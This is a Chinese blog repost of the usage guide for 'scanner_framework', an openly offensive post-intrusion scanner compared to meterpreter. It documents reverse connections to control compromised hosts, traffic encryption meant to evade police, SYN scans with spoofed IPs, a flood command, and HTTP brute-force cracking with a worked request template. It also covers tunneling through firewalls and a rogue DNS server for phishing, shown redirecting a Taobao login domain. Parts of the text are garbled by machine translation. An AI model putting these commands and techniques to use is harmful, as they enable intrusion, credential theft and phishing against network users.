【内部网络扫描仪,网络探测框架】

scanner_framework

中文: 网络探测框架,适用于入侵到内网探测其它网络设备,探测器具有体积小,功能多,而且带有反向连接从内网穿透出外网连接控制终端,通信数据采用动态加密,再也不怕警察叔叔知道我在干坏事儿啦,为了方便破解一些弱口令设备,内部带有在线破解功能(暂时支持HTTP 破解).如果觉得这些功能满足不了需求,可以使用端口映射把你需要的工具直接通过隧道对接到内网的某台指定的主机端口上进行扫描…-- LCatro

中文(简体) : 这是一个内部网络扫描仪,如 meterpreter 。我将创建更多的功能到它扫描仪(现在包括许多基本的网络扫描仪和网络破解[如BurpSuite,crack HTTP])。反向连接功能是为了方便攻击者管理被黑客入侵的机器和密码进行通信。隧道连接可帮助您的攻击过程的网络流穿过内部网络的防火墙。

###启动方式 [如何启动它] scanner.exe 控制台启动 [通过控制台启动它]
scanner.exe -bind [%port%] 绑定端口,远程访问 [绑定本地端口等待您连接它]
scanner.exe -recon %ip% [%port%] 反向连接,远程访问,默认是80,注意记得先启动reverse_server ,不然扫描器.exe 不能成功连接 [反向连接指定 ip,警告!Remenber 首先启动reverse_server,然后使用此参数启动扫描仪.exe]

###使用方法 [如何使用它 ] 扫描当前网段存活的主机,并且自动搜集数据 [使用 ARP 请求查询当前网络中的实时计算机]
使用:
arp
获取当前主机的网络信息
你最了解它..]
using:ping %ip/host%
TCP SYN 扫描主机 [tcp syn scan,set -P scanner will test port,set -F is fake a ip for hide itsalf in attack flow]
using:scan %ip% [-P:[port1,port2,port3,...]] [-F:[fake_ip1,fake_ip2,...]]
洪水攻击主机 [不要使用它 ,因为你会暴露,所以我从不开发这个函数]
使用:flood %ip% [-P:[port1,...]] [-F:[fake_ip1,...]]
在线破解 [online crack]
using:crack %ip% %port% [%user_dictionary_path% %password_dictionary_path%]
路由跟踪 [tracert route]
using:tracert %ip/host%
抓取页面 [get a HTML page on server]
using:getpage %ip% [-PORT:%port%] [-PATH:%path%]
启动端口转发功能 [tunnal port]
using:route -R:[%remote_ip%,%remote_port%] -L:[[%local_ip%,]%local_port%]
启动DNS 服务器 [dns server]
using:dns [run|start] | add %host% %ip% |删除 %ip%
获取外网IP 地址和粗略定位 [get internet ip no is internal network ip and get the location]
using:ip
显示帮助 [show help]
using:help
退出 [exit scanner]
using:quit
###在线破解 [关于在线破解]

在线破解功能原理是通过自己构造特定的HTTP 数据包然后程序根据字典穷举测试出帐号密码

什么是表达式?

表达式的意思是给程序一个填充数据的框架,在接下来的穷举测试中会根据表达式内的关键字来填充数据,下面是在线破解的例子:

本地网络192.168.1.103:80 启用了PHP 服务器,在探测器里面输入破解命令

破解 192.168.1.103 80

然后会提示输入表达式

输入您的破解快车:

输入数据包数据: POST http://192.168.1.103:80/api/analays.php HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
referer: http://192.168.1.103/api/analays.php
Accept-Language: zh-CN
用户代理:Mozilla/4.0(兼容;MSIE 7.0;视窗NT 6.1;哇64;三叉戟/5.0;SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 192.168.1.103
Content-length: %length%
Pragma: no-cache

user=%username%&pass=%password%

其中Content-length: %length% 的意思是让程序自动在此填充上下文的大小[因为这个长度是会变化的],%username% 和%password% 就是自动填充用户名和密码
[这里也可以不需要全部都用,比如破解水星路由器,直接填%password% 即可启动]
最后输入来确认数据包填写完成,如果中间某个位置出现填写错误就输入来重新填写破解数据包,下面的输入成功判断条件也是同理..

输入您的检查期限:

输入成功判断条件,由于经过测试,如果输入密码成功的话,页面会返回一个包含Success 的字符串,然后把他作为破解成功的测试条件..
成功

现在破解!

网络破解 - 目标:192.168.1.103:80
用户名:root 密码:toor

破解完成

表达式函数:

base64(%string%) -- 采用base64 编码
time() -- 获取系统时间
len(%string%) -- 统计字符串长度
rnd([%low%-%up%]) -- 在%low% 到%up% 之间生成随机数

例:

破解水星的数据包 (其它都差不多,关键在Cookie):

饼干:a2404_pages=10;a2404_times=5;授权 = 基本 %20base64(管理员:%密码%)

接下来会把%password% 先填充好之后再编码base64

DNS 服务器 [关于 DNS 服务器]

DNS 服务器是针对内网的信息钓鱼,比如通过伪造的站点来钓得更多的个人信息或者欺骗应用程序更新,如果上面的用法还不太明白的话可以看这里 [DNS 服务器通常使用重定向到网络钓鱼网站]

dns run 启动DNS 服务器 [运行 dns 服务器]
dns 退出DNS 服务器 [退出 dns 服务器]
dns 添加 m.login.taobao.com 127.0.0.1 把淘宝的手机登陆域名绑定到本地 IP [点 m.login.taobao.com 通过 dns 设置到 localhost]
dns 删除 www.baidu.com 删除DNS 查询项目 [删除此记录]

端口转发原理 [tunnal 端口设计]

在这里插入图片描述###Other

#####reverse_server 是用来做反向连接用的服务端

#####scanner.exe -bind 参数启动程序需要自己主动连过去,但是客户端还没写,也没什么需求,以后慢慢来…

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiangtianwangxingxin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值